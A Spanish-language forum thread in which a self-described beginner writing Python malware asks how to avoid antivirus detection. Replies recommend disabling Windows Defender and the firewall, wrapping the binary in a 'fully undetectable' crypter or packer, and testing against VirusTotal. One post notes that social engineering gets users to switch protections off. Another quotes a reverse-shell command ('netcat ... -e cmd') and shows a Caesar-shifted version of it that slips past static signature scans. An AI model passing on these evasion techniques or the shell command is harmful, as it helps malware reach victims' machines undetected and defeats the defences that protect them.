Evitar antivirus

[retr02332]

Soy nuevo en esto de la seguridad, estoy aprendiendo a crear malware con python, con fines educativos claro.

La cosa es que noto que al generar el exe, y descargarlo en una maquina virtual, este no se completa ya que los antivirus estan ahi complicando las cosas. Mi pregunta es:

Como puedo hacer para que en lo posible, los antivirus no detecten mi malware?

Tambien me aparece eso de descargas de terceros, creo que es porque no estoy verificado o no tengo licencias, como puedo arreglar esto.

Espero resupesta a las dos preguntas, muchas gracias.

[Tirenex]

Hola amigo, a mi también me surgió esa duda y lo que hice es ir al buscador de programas y archivos, escribir Firewall,  y a la izquierda, aparece una opción que dice activar o desactivar firewall de windows, click ahí y pulsas donde desactivar firewall de windows (no recomendado). tú prueba eso y me comentas si dió resultado

[fairlight666]

Hola amigo, a mi también me surgió esa duda y lo que hice es ir al buscador de programas y archivos, escribir Firewall,  y a la izquierda, aparece una opción que dice activar o desactivar firewall de windows, click ahí y pulsas donde desactivar firewall de windows (no recomendado). tú prueba eso y me comentas si dió resultado

En todo caso sería realizar un proceso parecido pero buscando al AV, por ejemplo, el Windows Defender (al menos en W10) y desactivarlo, porque es lo que más rompe las bolas al momento de trastear con cochinadas informáticas.

Lo ideal para evitar que los AV's se alarmen con los bichitos es blindarlos con un crypter FUD (FUD significa "totalmente indetectable"). Para que el bichito quede "invisible" a los ojos de los AV's, deberías comprar un crypter o crear el tuyo y cifrar el bicho. Los crypters que encuentres por Internet podrían estar más quemados que el carbón y no servirían de nada.

PD: Hace tiempo que no entraba al forillo...

[@XSStringManolo]

Chequea el Antivirus Hacker's Handbook es una muy buena intro al tema.

Hay otro que se llama disasembling malware o algo así que igual te interesa también.

[chatiel]

Los antivirus justamente están para leer los códigos y ver que no estés queriendo hacer nada raro.
Cuando ve que utilizas una API que necesita privilegios o que no es normal salta la alarma.

Muchos lo que haces es proteger y cifrar un poco el código y para eso existe los PACKERS.

Podrías ir probando tu Exe normal en virustotal.com y ver cuantos te toman como virus y después podes Ofuscarlo con un PACKER para ver los resultados.

[XKC]

Los antivirus justamente están para leer los códigos y ver que no estés queriendo hacer nada raro.
Cuando ve que utilizas una API que necesita privilegios o que no es normal salta la alarma.

Muchos lo que haces es proteger y cifrar un poco el código y para eso existe los PACKERS.

Podrías ir probando tu Exe normal en virustotal.com y ver cuantos te toman como virus y después podes Ofuscarlo con un PACKER para ver los resultados.

Nunca jama usar virus total, compartían tu malware con las marcas de entivirus y a amepzar de nuevo

[@XSStringManolo]

Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí.

[lBoreal]

Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí.

Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows)

La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible.

Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea

[@XSStringManolo]

Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows)

La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible.

Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea

Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos.

[lBoreal]

Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos.

Mañana me armo la máquina virtual tal como me recomendaste, es como decís, es cuestión de jugar un poco.

Gracias Manolo